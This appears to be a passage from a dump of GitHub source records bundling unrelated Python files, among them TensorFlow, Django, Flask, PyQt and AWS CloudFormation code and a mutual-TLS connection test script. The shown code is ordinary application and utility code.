asyncio.create_subprocess_exec(\n *args, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE\n )\n stdout, stderr = await process.communicate()\n return (\n stdout.decode(\"utf-8\", \"replace\").strip(),\n stderr.decode(\"utf-8\", \"replace\").strip(),\n process.returncode,\n process.pid,\n )\n\n\ndef run_sync(func, *args, **kwargs):\n return asyncio.get_event_loop().run_in_executor(\n None, functools.partial(func, *args, **kwargs)\n )\n\n\ndef run_async(loop, coro):\n return asyncio.run_coroutine_threadsafe(coro, loop).result()\n\n\ndef runasync(func: callable):\n \"\"\"Run async functions with the right event loop.\"\"\"\n loop = asyncio.get_event_loop()\n return loop.run_until_complete(func)\n","repo_name":"thejmthon/jmjoz","sub_path":"jmisbest/helpers/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"79"} +{"seq_id":"2244258469","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.slim import losses\nfrom tensorflow.contrib.slim import arg_scope\nimport numpy as np\n\nnum_classes = 21\n\ndef vgg16(images, batch_size, ACT=False, is_training=True,\n filter_num = [64,64,128,128,256,256,256,512,512,512,512,512,512]):\n act_summaries = []\n with tf.variable_scope('vgg_16', 'vgg_16',\n regularizer=tf.contrib.layers.l2_regularizer(0.5)): # 0.0005\n initializer = tf.random_normal_initializer(mean=0.0, stddev=0.01)\n with tf.variable_scope('conv1'):\n net = slim.conv2d(images, filter_num[0],\n [3, 3], trainable=False, scope='conv1_1') # 64\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[1],\n [3, 3], trainable=False, scope='conv1_2') # 64\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2,2], padding = 'SAME', scope='pool1')\n with tf.variable_scope('conv2'):\n net = slim.conv2d(net, filter_num[2],\n [3, 3], trainable = False, scope='conv2_1') # 128\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[3],\n [3, 3], trainable = False, scope='conv2_2') # 128\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2,2], padding = 'SAME', scope = 'pool2')\n with tf.variable_scope('conv3'):\n net = slim.conv2d(net, filter_num[4],\n [3, 3], trainable = False, scope='conv3_1') # 256\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[5],\n [3, 3], trainable = False, scope='conv3_2') # 256\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[6],\n [3, 3], trainable = False, scope='conv3_3') # 256\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[5],\n [3, 3], trainable = False, scope='conv3_2') # 256\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[6],\n [3, 3], trainable = False, scope='conv3_3') # 256\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool3')\n with tf.variable_scope('conv4'):\n net = slim.conv2d(net, filter_num[7],\n [3, 3], trainable = False, scope='conv4_1') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[8],\n [3, 3], trainable = False, scope='conv4_2') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[9],\n [3, 3], trainable = False, scope='conv4_3') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[8],\n [3, 3], trainable = False, scope='conv4_2') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[9],\n [3, 3], trainable = False, scope='conv4_3') # 512\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool4')\n with tf.variable_scope('conv5'):\n net = slim.conv2d(net, filter_num[10],\n [3, 3], trainable = False, scope='conv5_1') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[11],\n [3, 3], trainable = False, scope='conv5_2') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[12],\n [3, 3], trainable = False, scope='conv5_3') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[11],\n [3, 3], trainable = False, scope='conv5_2') # 512\n act_summaries.append(net)\n net = slim.conv2d(net, filter_num[12],\n [3, 3], trainable = False, scope='conv5_3') # 512\n act_summaries.append(net)\n net = slim.max_pool2d(net, [2,2], padding='SAME', scope='pool5')\n [a,b,c,d] = net.get_shape().as_list()\n pool5_flat = slim.flatten(net, [batch_size,b*c*d], scope='flatten')\n fc6 = slim.fully_connected(pool5_flat,4096,trainable=is_training,scope='fc6')\n if is_training:\n fc6 = slim.dropout(fc6, scope='dropout6')\n fc7 = slim.fully_connected(fc6,4096,trainable=is_training,scope='fc7')\n if is_training:\n fc7 = slim.dropout(fc7, scope='dropout7')\n cls_score = slim.fully_connected(fc7, num_classes,\n weights_initializer=initializer,\n trainable=is_training,\n activation_fn=None, scope='cls_score')\n cls_prob = tf.nn.softmax(cls_score, name=\"cls_prob\")\n\n\n # predictions[\"cls_score\"] = cls_score\n # predictions[\"cls_prob\"] = cls_prob\n # score_summaries.update(predictions)\n\n if ACT:\n return cls_score, cls_prob, act_summaries\n return cls_score, cls_prob\n","repo_name":"shuang1330/tf_vgg16_voc","sub_path":"lib/nets/vgg16.py","file_name":"vgg16.py","file_ext":"py","file_size_in_byte":5176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"13451223415","text":"from datetime import datetime, time, timedelta, date\nimport pytz\n\n\nMONDAY = 0\n\n\ndef to_datetime(a_date):\n return datetime.combine(a_date, time(0)).replace(tzinfo=pytz.UTC)\n\n\ndef to_date(a_datetime):\n if a_datetime is None:\n return None\n elif isinstance(a_datetime, datetime):\n return a_datetime.date()\n elif isinstance(a_datetime, date):\n return a_datetime\n else:\n raise ValueError(\"{0!r} ({1}) isn't a date or datetime\"\n .format(a_datetime, type(a_datetime)))\n\n\ndef to_utc(a_datetime):\n return a_datetime.astimezone(pytz.UTC)\n\n\ndef period_range(start_date, end_date):\n start_date = to_date(start_date) or a_week_ago()\n end_date = to_date(end_date) or a_week_ago()\n\n if start_date > end_date:\n raise ValueError(\"Bad period: !(start_date={0} <= end_date={1})\"\n .format(start_date, end_date))\n\n if start_date.weekday != MONDAY:\n start_date = start_date - timedelta(days=start_date.weekday())\n\n period = timedelta(days=7)\n while start_date <= end_date:\n yield (start_date, start_date + timedelta(days=6))\n start_date += period\n\n\ndef a_week_ago():\n return date.today() - timedelta(days=7)\n","repo_name":"alphagov/backdrop-ga-collector","sub_path":"collector/datetimeutil.py","file_name":"datetimeutil.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"70128954177","text":"'''\n=> Script para fazer teste de conexão individual. Client_number é o o id do Telegram do \"atacante\".\n'''\n\nimport socket, ssl, sys\nimport time\nclient_number = \"id_do_telegram_do_atacante\";\nCERT_AU = \"ca_bundle.pem\"\nCERT_1 = f\"{client_number}_crt.pem\";\nKEY = f\"{client_number}.pem\";\nseparador = \":*!$+\";\nsock = socket.socket(socket.AF_INET);\ncontext = ssl.create_default_context(ssl.Purpose.SERVER_AUTH);\ncontext.set_ciphers('EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH')\ncontext.check_hostname = False;\ncontext.load_cert_chain(certfile=CERT_1, keyfile=KEY)\ncontext.load_verify_locations(cafile=CERT_AU);\nconn = context.wrap_socket(sock);\n\nconn.connect(('IP_do_alvo_do_teste', 50052));\nresposta = conn.recv();\nresposta = resposta.decode('UTF-8');\nif resposta == \"???\":\n conn.write(bytes(sys.argv[1],\"utf-8\"));\n resposta = conn.recv();\n conn.close();\n","repo_name":"joaopedrolourencoaffonso/Chimera-chat","sub_path":"scripts_para_testes/teste_conexao_SSL.py","file_name":"teste_conexao_SSL.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"1442173101","text":"from datetime import datetime, timedelta\r\nfrom unittest import TestCase\r\n\r\nimport pytest\r\n\r\nfrom core.services.channel_update import AverageCalculator, average\r\n\r\n\r\nclass TestAverageCalculator(TestCase):\r\n def test_push_value_should_store_the_value(self):\r\n calculator = AverageCalculator(period=60, start_at=datetime.now())\r\n calculator.push_value(1, datetime.now())\r\n assert calculator.values == [1]\r\n\r\n def test_push_value_should_clear_values_when_period_elapsed(self):\r\n calculator = AverageCalculator(period=60, start_at=datetime.now())\r\n calculator.push_value(2, datetime.now())\r\n calculator.push_value(1, datetime.now() + timedelta(seconds=61))\r\n assert calculator.values == [1]\r\n\r\n def test_has_average_should_return_false_when_period_didnt_elapse(self):\r\n calculator = AverageCalculator(period=60, start_at=datetime.now())\r\n calculator.push_value(1, datetime.now())\r\n assert calculator.has_average is False\r\n\r\n def test_has_average_should_return_true_when_period_elapsed(self):\r\n calculator = AverageCalculator(period=60, start_at=datetime.now())\r\n calculator.push_value(2, datetime.now())\r\n calculator.push_value(1, datetime.now() + timedelta(seconds=61))\r\n assert calculator.has_average is True\r\n\r\n def test_pop_average_should_return_average(self):\r\n calculator = AverageCalculator(period=60, start_at=datetime.now())\r\n calculator.push_value(2, datetime.now())\r\n calculator.push_value(1, datetime.now() + timedelta(seconds=61))\r\n value, _ = calculator.pop_average()\r\n assert value == 2\r\n\r\n def test_pop_average_should_return_timestamp_in_the_middle_of_period(self):\r\n now = datetime(2017, 2, 2, 10, 0, 10)\r\n calculator = AverageCalculator(period=60, start_at=now)\r\n calculator.push_value(2, now + timedelta(seconds=20))\r\n calculator.push_value(10, now + timedelta(seconds=70))\r\n _, actual = calculator.pop_average()\r\n expected = now + timedelta(seconds=30)\r\n assert actual == expected\r\n\r\n def test_calculator_should_work_for_multiple_periods(self):\r\n now = datetime(2017, 2, 2, 10, 0, 10)\r\n calculator = AverageCalculator(period=60, start_at=now)\r\n calculator.push_value(2, now + timedelta(seconds=20))\r\n calculator.push_value(10, now + timedelta(seconds=70))\r\n calculator.push_value(15, now + timedelta(seconds=75))\r\n calculator.push_value(20, now + timedelta(seconds=127))\r\n actual = calculator.pop_average()\r\n expected = (12.5, now + timedelta(seconds=90))\r\n assert actual == expected\r\n\r\n def test_pop_average_should_raise_exception_when_no_average_to_pop(self):\r\n now = datetime(2017, 2, 2, 10, 0, 10)\r\n calculator = AverageCalculator(period=60, start_at=now)\r\n with pytest.raises(RuntimeError):\r\n calculator.pop_average()\r\n\r\n\r\ndef test_average_should_return_none_for_empty_list():\r\n assert average([]) is None\r\n\r\n\r\ndef test_average_should_return_valid_average_of_numbers():\r\n assert average([3, 1, 2]) == 2\r\n\r\n\r\ndef test_average_should_drop_minimal_and_maximal_value_when_there_is_more_than_four_values():\r\n assert average([0, 2, 3, 4, 1000]) == 3\r\n\r\n","repo_name":"darksv/dashboard","sub_path":"app/core/services/test_channel_update.py","file_name":"test_channel_update.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12278052550","text":"from BasicModule.Mode import*\nfrom UserDefinedModule.PowerFlow import*\n\nclass YtoYbus(threePhaseData_original):\n\n \n#==============================================================================\n# def setInit(self): # 2\n# par = []\n# par.append(['Y12', None])\n# par.append(['Y23', None])\n# par.append(['Y13', None])\n# par.append(['Ybus', None])\n# self.setInitValue(par)\n#==============================================================================\n \n \n def do(self):\n self.copyValue()\n self.CalYbus()\n print('Ybus',self.Ybus)\n \n def CalYbus(self):\n \n self.Y12 = self.lastMode.Llist[0]\n self.Y23 = self.lastMode.Llist[1]\n self.Y13 = self.lastMode.Llist[2]\n \n self.Y11 = (self.Y12+self.Y13)\n self.Y22 = (self.Y12+self.Y23)\n self.Y33 = (self.Y13+self.Y23)\n self.Ybus=[[self.Y11,-1*self.Y12,-1*self.Y13],[-1*self.Y12,self.Y22,-1*self.Y23],[-1*self.Y13,-1*self.Y23,self.Y33]]\n \n \n \nclass ZtoYbus(YtoYbus): # 1\n#==============================================================================\n# def setInit(self):\n# par = []\n# par.append(['Z12', None])\n# par.append(['Z23', None])\n# par.append(['Z13', None])\n# par.append(['Ybus', None])\n# self.setInitValue(par)\n# print(par)\n#==============================================================================\n def setintro(self):\n info = 'Calculate the Ybus Matrix.\\n'\n info = info + ' I Matrix * Ybus Matrix = V Matrix \\n' \n info = info + 'I1=(-1/Z12)*(V1-V2)+(-1/Z13)*(V1-V2)\\n'+'I2=(-1/Z12)*(V2-V1)+(-1/Z23)*(V2-V3)\\n'+'I3=(-1/Z13)*(V3-V1)+(-1/Z23)*(V3-V2)\\n'\n self.intro_str = info\n \n def do(self):\n self.copyValue()\n self.CalYbus()\n print('Ybus',self.Ybus)\n \n\n \n def CalYbus(self):\n \n self.Z12 = self.lastMode.Llist[0]\n self.Z23 = self.lastMode.Llist[1]\n self.Z13 = self.lastMode.Llist[2]\n \n self.Z11 = 1/(1/self.Z12+1/self.Z13)\n self.Z22 = 1/(1/self.Z12+1/self.Z23)\n self.Z33 = 1/(1/self.Z13+1/self.Z23)\n self.Ybus=[[1/self.Z11,-1/self.Z12,-1/self.Z13],[-1/self.Z12,1/self.Z22,-1/self.Z23],[-1/self.Z13,-1/self.Z23,1/self.Z33]]\n \n \n \n \n \nif __name__=='__main__':\n a = YtoYbus()\n a.do()\n print(a.AllVariables)\n print(a.getValue(a, 'Y12'))\n print(a.getValue(a, 'Y23'))\n print(a.getValue(a, 'Y13'))\n print(a.getValue(a, 'Ybus'))\n \n b = ZtoYbus()\n b.do()\n print(b.AllVariables)\n print(b.getValue(a, 'Z12'))\n print(b.getValue(a, 'Z23'))\n print(b.getValue(a, 'Z13'))\n print(b.getValue(a, 'Ybus'))\n \n\n\n","repo_name":"ncu-psl/MasonPy","sub_path":"MasonPy_System/MasonPy_DSL/UserDefinedModule/YbusMatrix.py","file_name":"YbusMatrix.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"70650493377","text":"from tkinter import*\nimport tkinter.ttk as exTk\nfrom PIL import Image, ImageTk\nimport googletrans\nfrom googletrans import Translator\n\nroot = Tk()\nroot.title('Google Galaxy')\nroot.geometry('500x630')\nroot.iconbitmap(\"logo.ico\")\n\nload = Image.open(\"background.png\")\nrender = ImageTk.PhotoImage(load)\nimg = Label(root, image=render)\nimg.place(x=0, y=0)\n\nname = Label(root, text=\"Translator\", fg=\"#FFFFFF\", bd=0, bg=\"#01142C\")\nname.config(font=(\"Transformers Movie\",30))\nname.pack(pady=10)\n\nkeys = list(googletrans.LANGUAGES.values())\nvalues = list(googletrans.LANGUAGES.keys())\nadict = dict(zip(keys, values))\n\ncombo = exTk.Combobox(root)\ncombo['value'] = tuple(keys)\ncombo.pack(pady=0)\n\nbox = Text(root, width=28, height=8, font=(\"ROBOTO\", 16))\nbox.pack(pady=10)\n\ncombo1 = exTk.Combobox(root)\ncombo1['value'] = tuple(keys)\ncombo1.place(x=180, y=360)\n\nbutton_frame = Frame(root).pack(side=BOTTOM)\n\ndef clear():\n box.delete(1.0, END)\n box1.delete(1.0, END)\ndef translate():\n box1.delete(1.0, END)\n INPUT = box.get(1.0, END)\n print(INPUT)\n t = Translator()\n a = t.translate(INPUT, src=adict[combo.get()], dest=adict[combo1.get()])\n b = a.text\n box1.insert(END, b)\n\nclear_button = Button(button_frame, text=\"Clear text\", font=((\"Arial\"),10,\"bold\"), bg=\"#303030\", fg=\"#FFFFFF\", command=clear)\nclear_button.place(x=150, y=320)\ntrans_button = Button(button_frame, text=\"Translate\", font=((\"Arial\"),10,\"bold\"), bg=\"#303030\", fg=\"#FFFFFF\", command=translate)\ntrans_button.place(x=290, y=320)\n\nbox1 = Text(root, width=28, height=8, font=(\"ROBOTO\", 16))\nbox1.place(x=80,y=390)\n\nroot.mainloop()\n","repo_name":"HOWRY02/Google_Translate","sub_path":"Translate.py","file_name":"Translate.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"4821684591","text":"# DO NOT modify this file by hand, changes will be overwritten\nfrom dataclasses import dataclass\n\nfrom cloudformation_cli_python_lib.interface import BaseModel\nfrom cloudformation_cli_python_lib.recast import recast_object\nfrom cloudformation_cli_python_lib.utils import deserialize_list\n\nimport sys\nfrom inspect import getmembers, isclass\nfrom typing import (\n AbstractSet,\n Any,\n Generic,\n Mapping,\n MutableMapping,\n Optional,\n Sequence,\n Type,\n TypeVar,\n)\n\nT = TypeVar(\"T\")\n\n\ndef set_or_none(value: Optional[Sequence[T]]) -> Optional[AbstractSet[T]]:\n if value:\n return set(value)\n return None\n\n\n@dataclass\nclass AwsSsmMaintenancewindowtarget(BaseModel):\n OwnerInformation: Optional[str]\n Description: Optional[str]\n WindowId: Optional[str]\n ResourceType: Optional[str]\n Targets: Optional[Sequence[\"_Targets\"]]\n Id: Optional[str]\n Name: Optional[str]\n\n @classmethod\n def _deserialize(\n cls: Type[\"_AwsSsmMaintenancewindowtarget\"],\n json_data: Optional[Mapping[str, Any]],\n ) -> Optional[\"_AwsSsmMaintenancewindowtarget\"]:\n if not json_data:\n return None\n dataclasses = {n: o for n, o in getmembers(sys.modules[__name__]) if isclass(o)}\n recast_object(cls, json_data, dataclasses)\n return cls(\n OwnerInformation=json_data.get(\"OwnerInformation\"),\n Description=json_data.get(\"Description\"),\n WindowId=json_data.get(\"WindowId\"),\n ResourceType=json_data.get(\"ResourceType\"),\n Targets=deserialize_list(json_data.get(\"Targets\"), Targets),\n Id=json_data.get(\"Id\"),\n Name=json_data.get(\"Name\"),\n )\n\n\n# work around possible type aliasing issues when variable has same name as a model\n_AwsSsmMaintenancewindowtarget = AwsSsmMaintenancewindowtarget\n\n\n@dataclass\nclass Targets(BaseModel):\n Values: Optional[Sequence[str]]\n Key: Optional[str]\n\n @classmethod\n def _deserialize(\n cls: Type[\"_Targets\"],\n json_data: Optional[Mapping[str, Any]],\n ) -> Optional[\"_Targets\"]:\n if not json_data:\n return None\n return cls(\n Values=json_data.get(\"Values\"),\n Key=json_data.get(\"Key\"),\n )\n\n\n# work around possible type aliasing issues when variable has same name as a model\n_Targets = Targets\n\n\n","repo_name":"aws-cloudformation/community-registry-extensions","sub_path":"hooks/Lambda_Invoker/src/awscommunity_lambda_invoker/target_models/aws_ssm_maintenancewindowtarget.py","file_name":"aws_ssm_maintenancewindowtarget.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"79"} +{"seq_id":"26620944319","text":"from django.shortcuts import render, redirect\nfrom . import models\nfrom movie.form import FormMovie\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\n\n# Create your views here.\n@login_required(login_url=settings.LOGIN_URL)\ndef tampilmovie(request):\n if request.POST:\n models.Movie.objects.all()\n \n tampilkan = models.Movie.objects.all()\n return render(request, 'indexmovie.html',\n\t\t{ 'data': tampilkan,\n\t\t})\n\ndef detailmovie(request, id):\n\tdetail_d = models.Movie.objects.filter(pk=id).first()\n\treturn render(request, 'detailmovie.html',\n\t\t{ 'data': detail_d,\n\t\t})\n\ndef tambahmovie(request, id):\n if request.POST:\n form = FormMovie(request.POST)\n if form.is_valid():\n form.save()\n form = FormMovie()\n pesan = 'Data Berhasil di Simpan'\n konteks = {\n 'form':form,\n 'pesan':pesan\n }\n return render(request, 'tambahmovie.html', konteks)\n else:\n form = FormMovie()\n konteks = {\n 'form':form,\n }\n return render(request, 'tambahmovie.html', konteks)\n\ndef editmovie(request, id_judul):\n juduls = models.Movie.objects.get(id=id_judul)\n template = 'editmovie.html'\n if request.POST:\n form = FormMovie(request.POST, instance=juduls)\n if form.is_valid():\n form.save()\n messages.success(request, 'Data Berhasil di Perbarui')\n return redirect('editmovie', id_judul=id_judul)\n else:\n form = FormMovie(instance=juduls)\n konteks = {\n 'form':form,\n 'juduls':juduls\n }\n return render(request, template, konteks)\n\ndef deletemovie(request, id):\n delete_d = models.Movie.objects.filter(pk=id).delete()\n return redirect('/movie')","repo_name":"adi-em/django","sub_path":"anime/project1/movie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29878894785","text":"import json\nfrom os import path\nDB_FILE_PATH = '/home/himaet23/EwasteNonDestructiveDisassembly/src/CentralNode/src/storage/get_tool_schedule.json'\n\n\n\nclass ChangeToolScheduleDatabase(object):\n\n _instance = None\n def __new__(self):\n if not self._instance:\n self._instance = super(ChangeToolScheduleDatabase,self).__new__(self)\n self.config = {}\n return self._instance\n \n\n def readFromDB(self, key):\n self.checkFile()\n self.readFile()\n val = self.config[key]\n self.resetConfig()\n return val\n\n def readAllFromDB(self):\n self.checkFile()\n self.readFile()\n val = self.config\n self.resetConfig()\n return val\n\n\n def checkFile(self):\n if path.isfile(DB_FILE_PATH) is False:\n raise Exception(\"File not found\")\n \n def readFile(self):\n with open(DB_FILE_PATH) as db:\n self.config = json.load(db)\n\n def saveFile(self):\n with open(DB_FILE_PATH, 'w') as db:\n json.dump(self.config, db)\n\n def resetConfig(self):\n self.config = {}\n\nif __name__ == \"__main__\":\n print(\"Hello, World!\")\n f = ChangeToolScheduleDatabase()\n\n print(ChangeToolScheduleDatabase().readFromDB(\"Mohsen\"))","repo_name":"ebrahimabdelghfar/EwasteNonDestructiveDisassembly","sub_path":"src/CentralNode/src/storage/change_tool_database.py","file_name":"change_tool_database.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"39173727028","text":"import sketch\nimport sys\nimport os\nimport pickle\nimport myhash\n\ndef main():\n f = open(sys.argv[2])\n T = int(sys.argv[1])\n s = []\n mh = myhash.MyHash()\n for i in range(T):\n s.append(sketch.Sketch(i+1))\n\n i = 0\n while True:\n i += 1\n if (i%100000 == 0):\n print(str(i) + \"lines done\")\n line = f.readline()\n if line == '':\n break\n words = line.rstrip().split()\n blocks = [int(w) for w in words]\n \n for i in range(T):\n Si = mh.changeVec16toU64(blocks[:i+1])\n s[i].insert(Si, 1)\n \n print(\"main sketch's numweights, sumweights, fi, F2\")\n\n \n\n print(str(s[0].numweights) + \",\"\n + str(s[0].sumweights) + \",\"\n + str(12) + \": \" + str(s[0].fi(12)) + \",\"\n + str(s[0].F2()))\n print(\"---\")\n\n for i in range(T):\n output=open(sys.argv[2]+'.sketch.'+str(i+1), 'wb')\n pickle.dump(s[i], output)\n output.close()\n \nif __name__ == '__main__':\n main()\n \n","repo_name":"lavanyaj/random","sub_path":"secondsketcher.py","file_name":"secondsketcher.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40684777949","text":"import os\nimport dotenv\nfrom flask import Flask\nfrom flask_cors import CORS\n\nfrom project.middleware.connect import Connect\nfrom project.middleware.authIdentifier import AuthIdentifier\n\nfrom project.flask.notifications import Notifications\nfrom project.flask.identifiers import Identifiers\n\ndotenv.load_dotenv()\ndebug_mode = True if os.getenv(\"DEBUG_MODE\") == \"1\" else False\n\n\ndef create_app(config_filename=None, instance_relative_config=True):\n app = Flask(__name__)\n\n if config_filename is not None:\n app.config.from_pyfile(config_filename)\n\n CORS(app)\n cors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n app.wsgi_app = AuthIdentifier(app.wsgi_app)\n app.wsgi_app = Connect(app.wsgi_app)\n\n app.add_url_rule(\n f\"/webhook\",\n view_func=Notifications.webhook,\n endpoint=\"notifications_webhook\",\n methods=[\"POST\"],\n )\n\n app.add_url_rule(\n f\"/webhook\",\n view_func=Notifications.get_webhook,\n endpoint=\"notifications_webhook_get\",\n methods=[\"GET\"],\n )\n\n app.add_url_rule(\n f\"/identifier\",\n view_func=Identifiers.get_all,\n endpoint=\"identifier_get_all\",\n methods=[\"GET\"],\n )\n\n app.add_url_rule(\n f\"/identifier\",\n view_func=Identifiers.create,\n endpoint=\"identifier_create\",\n methods=[\"POST\"],\n )\n\n return app\n","repo_name":"pnk-sh/octopus-webhook","sub_path":"project/flask/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41494529816","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PyQt5 import QtWidgets, QtCore, QtGui\r\nfrom PyQt5.QtWidgets import QFileDialog, QWhatsThis\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import QCompleter\r\nfrom PyQt5.QtGui import QRegExpValidator\r\nimport pyqtgraph as pg \r\nimport numpy as np\r\nimport serial\r\nimport os\r\nfrom time import gmtime, strftime\r\nimport time\r\nimport traceback\r\nfrom pyqtgraph.Qt import QtGui, QtCore\r\nfrom pyqtgraph.Point import Point\r\nimport socket\r\nimport sys\r\n#from requests import get\r\n#import bluetooth\r\nimport qdarkstyle \r\nimport array\r\n\r\n__version__ = '1.0.0'\r\n\r\nclass CommonWindow(QtWidgets.QWidget):\r\n\t\"\"\"Класс основного окна программы\"\"\"\r\n\t#QMainWindow\r\n\t#QtWidgets.QWidget\r\n\tdef __init__(self, parent = None):\r\n\t\tQtWidgets.QMainWindow.__init__(self, parent)\r\n\r\n\t\tself.slave_address = 0x05\r\n\t\tself.slave_register = 0x10\r\n\t\tself.slave_register_address_hi = 0x10\r\n\t\tself.slave_register_address_lo = 0x00\r\n\t\tself.slave_register_count_hi = 0x00\r\n\t\tself.slave_register_count_lo = 0x02\r\n\t\tself.slave_byte_count = 0x04\r\n\t\tself.slave_speed_hi = 0x00\r\n\t\tself.slave_speed_lo = 0x0a\r\n\t\tself.slave_dir_hi = 0x00\r\n\t\tself.slave_dir_lo = 0x09 \r\n\t\tself.slave_crc16_lo = 0x00\r\n\t\tself.slave_crc16_hi = 0x00\r\n\t\tself.data_array = [0]*13#length of packet\r\n\t\tself.data_bytearray = bytearray(self.data_array)\r\n\r\n\t\tself.serialDeviceConnected = False\r\n\t\tself.file_description = \"\"\r\n\t\tself.file_data_ch1 = np.empty(0)\r\n\t\tself.file_data_ch2 = np.empty(0)\r\n\t\tself.file_data_pressure = np.empty(0)\r\n\t\tself.file_data_microphone = np.empty(0)\r\n\t\tself.file_x_ax = np.empty(0)\r\n\t\tself.data = [0]#test data value for plot\r\n\t\tself.data_download_done = 0\r\n\t\tself.data_load_from_file_done = 0\r\n\t\tself.milk_data_from_file = np.empty((2,256))\r\n\t\tself.trace1 = np.zeros(256)\r\n\t\tself.trace2 = np.zeros(256)\r\n\t\t#self.trace1 = np.random.random(256)\r\n\t\t#self.trace2 = np.random.random(256)\r\n\t\tself.trace3 = np.zeros(256)\r\n\t\tself.x_ax = np.linspace(0, 1, 256)\r\n\r\n\t\tself.filter_data_out = 30\r\n\t\tself.filter_k = 0.99\r\n\t\tself.data_to_storage = list()\r\n\r\n\t\tself.fetch_enable = False\r\n\r\n\t\tself.first_load = 0\r\n\t\tself.previous_row = 0\r\n\t\tself.current_row = -1\r\n\t\tself.data_from_f4 = 0\r\n\t\tself.y_axio = list()\r\n\t\tself.count = 0\r\n\t\tself.last_clicked_plot = 0\r\n\t\t#pg.setConfigOption('background', 'd')\r\n\t\tpg.setConfigOption('foreground', 'g')\t\r\n\t\t#self.label_graph = pg.LabelItem(text = \"x and y\", color = \"CCFF00\")#justify='right'\r\n\t\tself.graph = pg.PlotWidget()\r\n\t\tself.graph_pressure = pg.PlotWidget()\r\n\t\tself.lastClicked = []\r\n\t\t#PlotCurveItem PlotWidget\r\n\t\tself.graph.showGrid(1,1,1)\r\n\t\tself.graph_pressure.showGrid(1,1,1)\r\n\t\tself.plot_xaxis = list()\r\n\t\tself.index = 0\r\n\t\tself.graph.setLabel('bottom', \"Time, sec\")\r\n\t\tself.graph_pressure.setLabel(\"bottom\", \"Time, sec\")\r\n\t\t#self.graph.setLabel('top', self.label_graph)\r\n\t\t#self.graph.showLabel(show = True)\r\n\t\tself.graph.setMinimumSize(500,200)\r\n\t\tself.graph_pressure.setMinimumSize(500, 200)\r\n\t\t\r\n\t\tself.vb = self.graph.plotItem.vb\r\n\r\n\t\tself.vLine = pg.InfiniteLine(angle=90, movable=False, pen = pg.mkPen('y', width = 1))\r\n\t\tself.hLine = pg.InfiniteLine(angle=0, movable=False, pen = pg.mkPen('y', width = 1))\r\n\t\tself.graph.addItem(self.vLine, ignoreBounds=True)\r\n\t\tself.graph.addItem(self.hLine, ignoreBounds=True)\r\n\t\t#self.graph.setRange(yRange = (0,4095))\r\n\t\t#self.graph_pressure.setRange(yRange = (0,100))\r\n\r\n\t\tself.curve = self.graph.plot(self.x_ax,self.trace1, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\tself.curve = self.graph.plot(self.x_ax,self.trace2, pen = pg.mkPen('y', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\tself.curve_pressure = self.graph_pressure.plot(self.x_ax,self.trace3, pen = pg.mkPen('r', width = 3), symbol = 'o', symbolSize = 4)\r\n\r\n\t\tself.INITIAL_MODBUS = 0xFFFF\r\n\t\tself.INITIAL_DF1 = 0x0000\r\n\t\tself.table = (\r\n\t\t0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241,\r\n\t\t0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 